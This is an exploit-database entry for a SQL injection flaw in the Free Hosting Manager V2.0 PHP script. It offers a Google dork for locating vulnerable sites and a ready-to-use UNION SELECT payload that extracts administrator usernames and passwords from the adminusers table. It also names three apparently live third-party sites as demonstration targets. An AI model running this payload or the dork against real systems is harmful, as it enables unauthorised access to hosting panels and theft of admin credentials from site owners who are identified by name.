Free Hosting Manager V2.0 SQL Injection Vulnerability

2012-11-29T00:00:00
ID 1337DAY-ID-19820
Type zdt
Reporter Spiral
Modified 2012-11-29T00:00:00

Description

Free Hosting Manager is a php Script host sites

                                        
                                            ####
# Exploit Title: Free Hosting Manager V2.0 SQL Injection Vulnerability
# Author: Spiral
# E-mail: [email protected]
# Google Dork: inurl:clients/packages.php?id=1
# Tested on: [Windows 7]
# Vendor: http://www.fhm-script.com/download.php
####
  
  
# Exploit:
  
http://www.site.com/clients/viewaccount.php?id=[SQL]

http://www.site.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23

# Note: you must regsiter first !

# Demoz:
1- http://ghsites.net/clients/viewaccount.php?id=1'
2- http://yarahost.org/clients/viewaccount.php?id=1'
3- http://zaghost.us/order/clients/viewaccount.php?id=1'
 
# Greetz 2: alh7nooty | b0x | j0rd4n14n.r1z | dzx | security999 | tnt_hacker

#  0day.today [2018-01-24]  #